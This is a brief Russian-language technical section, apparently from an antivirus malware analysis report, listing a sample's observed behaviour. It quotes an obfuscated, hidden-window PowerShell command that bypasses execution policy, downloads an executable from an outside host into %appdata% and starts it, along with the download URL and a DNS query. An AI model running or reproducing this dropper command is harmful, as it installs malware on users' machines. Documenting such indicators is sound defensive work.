Техническая информация
- http://semiconductry.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWershEll.exE -ExECuTIOnPOLIcy bypASS -NOproFILE -wINDowstYLE HidDEN (nEw-OBjeCt sySTeM.NeT.webClieNt).dOWnlOADfIlE('http://semiconductry.top/search.php','%aPpdaTa%.ExE');STArT-pro...
- DNS ASK se####nductry.top
- '<SYSTEM32>\cmd.exe' /c "poWershEll.exE -ExECuTIOnPOLIcy bypASS -NOproFILE -wINDowstYLE HidDEN (nEw-OBjeCt sySTeM.NeT.webClieNt).dOWnlOADfIlE('http://semiconductry.top/search.php','%aPpdaTa%.ExE');STArT-pro...' (со скрытым окном)